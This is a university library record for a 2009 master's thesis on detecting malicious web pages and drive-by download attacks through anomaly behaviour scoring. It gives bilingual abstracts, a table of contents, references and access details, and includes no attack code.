Responsive image
博碩士論文 etd-0204109-163602 詳細資訊
Title page for etd-0204109-163602
論文名稱
Title
以異常行為偵測惡意網頁之研究
Malicious Web Page Detection Based on Anomaly Behavior
系所名稱
Department
畢業學年期
Year, semester
語文別
Language
學位類別
Degree
頁數
Number of pages
63
研究生
Author
指導教授
Advisor
召集委員
Convenor
口試委員
Advisory Committee
口試日期
Date of Exam
2008-07-25
繳交日期
Date of Submission
2009-02-04
關鍵字
Keywords
惡意網頁、異常行為、過路式下載
drive-by download, malicious web page, anomaly behavior
統計
Statistics
本論文已被瀏覽 5847 次,被下載 10
The thesis/dissertation has been browsed 5847 times, has been downloaded 10 times.
中文摘要
由於網際網路應用的便利性與多元化,人們十分依賴其來進行資訊搜尋與分享、論壇討論,以及線上服務。然而多數網站是由網路安全知識有限的工程師所建置,導致Web應用程式存在諸多安全漏洞;駭客也藉此植入惡意的JavaScript至受汙染的網頁,並等待機會觸發過路式下載攻擊。
根據本研究長時間觀察,相較於正常網頁,惡意網頁常以像是網頁編碼、關鍵字拆解等不尋常行為來逃避防毒軟體的檢測;這使得惡意網頁和正常網頁兩者在行為面上會出現明顯的差異。因此,本研究乃提出名為Web Page Checker (WPC) 客戶端之惡意網頁檢測機制;WPC是基於異常行為追蹤與分析之方式,來偵測惡意網頁。根據本研究實驗結果,顯示我們所提出之方法可以有效辨別惡意網頁並及時警告網站瀏覽者,証實異常行為檢測可被視為一個新的惡意網頁檢測方法。
Abstract
Because of the convenience of the Internet, we rely closely on the Internet to do information searching and sharing, forum discussion, and online services. However, most of the websites we visit are developed by people with limited security knowledge, and this condition results in many vulnerabilities in web applications. Unfortunately, hackers have successfully taken advantage of these vulnerabilities to inject malicious JavaScript into compromised web pages to trigger drive-by download attacks.
Based on our long time observation of malicious web pages, malicious web pages have unusual behavior for evading detection which makes malicious web pages different form normal ones. Therefore, we propose a client-side malicious web page detection mechanism named Web Page Checker (WPC) which is based on anomaly behavior tracing and analyzing to identify malicious web pages. The experimental results show that our method can identify malicious web pages and alarm the website visitors efficiently.
目次 Table of Contents
Chapter 1 Introductions 1
1.1Background 1
1.2 Motivation 4
Chapter 2 Related Works 6
2.1 Malicious Code Injection Mechanisms 6
2.1.1 Web Server Security 6
2.1.2 User Contributed Content 6
2.1.3 Advertisement 7
2.1.4 Third-Party Widgets 7
2.2 Malicious Code Obfuscation Techniques 8
2.2.1 Code Reordering 8
2.2.2 Junk Instruction Insertion 8
2.2.3 Equivalent Code Replacement 9
2.2.4 Code and Data Encapsulation 9
2.2.5 String Splitting 10
2.3 Malicious Code Detection Researches 11
2.3.1 Types of Injected Malicious Code 11
2.3.2 Related Research 13
2.3.3 Brief Conclusion 15
Chapter 3 The Proposed Approach 17
3.1 Introduction of Anomaly Behavior and Detection Approach 17
3.1.1 Deeper Depth 17
3.1.2 Web Page Encoding 18
3.1.3 Sensitive Keywords Splitting 19
3.1.4 Sensitive Keywords Encoding 20
3.1.5 Unreasonable Coding Styles 21
3.1.6 Redirection 22
3.2 Proposed System Architecture and System Flowchart 23
3.3 Detailed System Modules illustration 25
3.3.1 Web Page URL Extraction Module 26
3.3.2 Web Page Crawler Module 26
3.3.3 Behavior Extraction Module 26
3.3.3.1 Web Page Encoding Detection 26
3.3.3.2 Sensitive Keywords Splitting Detection 27
3.3.3.3 Sensitive Keywords Encoding Detection 28
3.3.3.4 Unreasonable Coding Styles Detection 29
3.3.3.5 Redirection Detection 30
3.4 MoBR Module 31
3.5 Anomaly Behavior Scoring Module 31
3.5.1 Predictor Variables of Behavior Scoring Formula 32
3.5.2 Weight Variables of Behavior Scoring Formula 32
3.5.3 Target Variable of Behavior Scoring Formula 33
Chapter 4 System Implementation and Experiment Design 38
4.1 System Implementation 38
4.2 Experiment Design 39
4.2.1 Samples Collection 39
4.2.2 Sampling and Experiment 40
4.3 Experiment Results 41
4.4 Comparisons 42
Chapter 5 Conclusions and Future Work 48
5.1 Conclusions 48
5.2 Future Work 49

參考文獻 References
[1] D. Stuttard and M. Pinto, The Web Application Hacker s Handbook: Discovering and Exploiting Security Flaws. New York: Wiley, 2007, pp. 768.
[2] P. Mavrommatis and N. Provos, "Introducing google's online security efforts," [Online document] May. 2007, [2008 Jul. 25], Available at HTTP: http://googleonlinesecurity.blogspot.com/2007/05/introducing-googles-anti-malware.html
[3] S. Northcutt, E. Skoudis, M. Sachs, J. Ullrich, T. Liston, E. Cole, E. Schultz, R. Dhamankar, A. Yoran, H. Schmidt, W. Pelgrin and A. Paller, " Top ten cyber security menaces for 2008," [Online document] n.d., [2008 Jul. 25], Available at HTTP: http://www.sans.org/2008menaces/?utm_source=web-sans&utm_medium=text-ad&utm_content=text-link_2008menaces_homepage&utm_campaign=Top_10__Cyber_Security_Menaces_-_2008&ref=22218
[4] C. Seifert, R. Steenson, T. Holz, Y. Bing and M. A. Davis, " Know your enemy: malicious web servers," [Online document] Aug. 2007, [2008 Jul. 25], Available at HTTP: http://www.honeynet.org/papers/mws/KYE-Malicious_Web_Servers.htm
[5] C. Seifert, " Know your enemy: behind the scenes of malicious web servers," [Online document] Nov. 2007, [2008 Jul. 25], Available at HTTP: http://www.honeynet.org/papers/wek/
[6] A. Moshchuk, T. Bragin, S. D. Gribble and H. M. Levy, "A crawler-based study of spyware in the web," in NDSS '06: Proceedings of the 13th Network and Distributed System Security, 2006, pp. 17-33.
[7] M. Christodorescu and S. Jha, "Testing malware detectors," in ISSTA '04: Proceedings of the 2004 ACM SIGSOFT International Symposium on Software Testing and Analysis, 2004, pp. 34-44.
[8] Shih-Fen Lin, Yung-Tsung Hou, Chia-Mei Chen, Bingchiang Jeng1 and Chi-Sung Laih, " Malicious Webpage Detection by Semantics-Aware Reasoning," in ISDA '08: Proceedings of The International Conference on Intelligent Systems Design and Applications, 2008, pp. 115-120.
[9] N. Provos, P. Mavrommatis, M. A. Rajab and F. Monrose, "All your iFrames point to us," [Online document] Feb. 2008, [2008 Jul. 25], Available at HTTP: http://research.google.com/archive/provos-2008a.pdf.
[10] N. Provos, D. McNamee, P. Mavrommatis, K. Wang and N. Modadugu, "The ghost in the browser analysis of web-based malware," in HotBots '07: Proceedings of the first USENIX workshop on hot topics in Botnets, 2007.
[11] Wikipedia contributors, "Web 2.0," [Online document] Nov. 2008, [2008 Nov. 13], Available at HTTP: http://en.wikipedia.org/w/index.php?title=Web_2.0&oldid=251217380.
[12] T. Jim, N. Swamy and M. Hicks, "Defeating script injection attacks with browser-enforced embedded policies," in WWW '07: Proceedings of the 16th international conference on World Wide Web, 2007, pp. 601-610.
[13] O. Hallaraker and G. Vigna, "Detecting malicious JavaScript code in mozilla," in ICECCS '05: Proceedings of the 10th IEEE International Conference on Engineering of Complex Computer Systems, 2005, pp. 85-94.
[14] C. Reis, J. Dunagan, H. J. Wang, O. Dubrovsky and S. Esmeir, "BrowserShield: Vulnerability-driven filtering of dynamic HTML," in OSDI '06: Proceedings of the 7th USENIX Symposium on Operating Systems Design and Implementation, 2006, pp. 5-5.
[15] D. Yu, A. Chander, N. Islam and I. Serikov, "JavaScript instrumentation for browser security," in POPL '07: Proceedings of the 34th Annual ACM SIGPLAN-SIGACT Symposium on Principles of Programming Languages, 2007, pp. 237-249.
[16] Y. Wang, D. Beck, X. Jiang and R. Roussev, "Automated web patrol with strider honeymonkeys:Finding web sites that exploit browser vulnerabilities," in NDSS '06: Proceedings of the 13th Annual Network and Distributed System Security Symposium, 2006.
[17] E. Kirda, C. Kruegel, G. Vigna and N. Jovanovic, "Noxes: A client-side solution for mitigating cross-site scripting attacks," in SAC '06: Proceedings of the 2006 ACM Symposium on Applied Computing, 2006, pp. 330-337.
[18] M. Christodorescu, S. Jha, S. A. Seshia, D. Song and R. E. Bryant, "Semantics-aware malware detection," in SP '05: Proceedings of the 2005 IEEE Symposium on Security and Privacy, 2005, pp. 32-46.
[19] M. D. Preda, M. Christodorescu, S. Jha and S. Debray, "A semantics-based approach to malware detection," in POPL '07: Proceedings of the 34th Annual ACM SIGPLAN-SIGACT Symposium on Principles of Programming Languages, 2007, pp. 377-388.
[20] E. Horowitz, S. Sahni and S. Anderson-Freed, Fundamentals of Data Structures in C. New York: W. H. Freeman & Co, 1992, pp. 585.
[21] StopBadware.org, " May 2008 badware websites report," [Online document] May. 2008, [2008 Jul. 25], Available at HTTP: http://www.stopbadware.org/pdfs/StopBadware_Infected_Sites_Report_062408.pdf
電子全文 Fulltext
本電子全文僅授權使用者為學術研究之目的,進行個人非營利性質之檢索、閱讀、列印。請遵守中華民國著作權法之相關規定,切勿任意重製、散佈、改作、轉貼、播送,以免觸法。
論文使用權限 Thesis access permission:校內一年後公開,校外永不公開 campus withheld
開放時間 Available:
校內 Campus: 已公開 available
校外 Off-campus:永不公開 not available

您的 IP(校外) 位址是 35.174.62.162
論文開放下載的時間是 校外不公開

Your IP address is 35.174.62.162
This thesis will be available to you on Indicate off-campus access is not available.

紙本論文 Printed copies
紙本論文的公開資訊在102學年度以後相對較為完整。如果需要查詢101學年度以前的紙本論文公開資訊,請聯繫圖資處紙本論文服務櫃台。如有不便之處敬請見諒。
開放時間 available 已公開 available

QR Code